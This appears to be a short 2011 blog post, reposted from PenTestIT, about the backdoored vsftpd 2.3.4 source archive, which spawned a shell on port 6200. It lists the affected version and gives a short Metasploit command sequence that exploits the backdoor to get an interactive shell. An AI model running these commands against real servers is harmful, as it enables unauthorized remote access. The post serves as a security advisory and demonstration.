2011.07.06 20:02

POC of Vsftpd backdoor discovered

vsftpd version of 2.3.4 downloadable source code was compromised and a backdoor added to the code. Evans, the author of vsftpd . This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011.

The bad tarball included a backdoor in the code which would respond to a user logging in with a user name by listening on port 6200 for a connection and launching a shell when someone connects.

If you have upgarded your VSFTPD check it out.

Affected versions :

  • vsftpd-2.3.4 from 2011-06-30

Metasploit demo :

  • use exploit/unix/ftp/vsftpd_234_backdoor
  • set RHOST localhost
  • set PAYLOAD cmd/unix/interact
  • exploit
  • id
  • uname -a 

출처 : PenTestIT

Trackback 0 Comment 1
  1. 0000 2012.09.20 23:25 address edit & del reply

    뭐..어떻게침투하는건가요.?
    그냥 백도어있으면 그걸찾아서들어가는건가요
    아니면 리버스쉘처럼 Vsftpd취약한버전을사용하면그냥뚫리는건가요?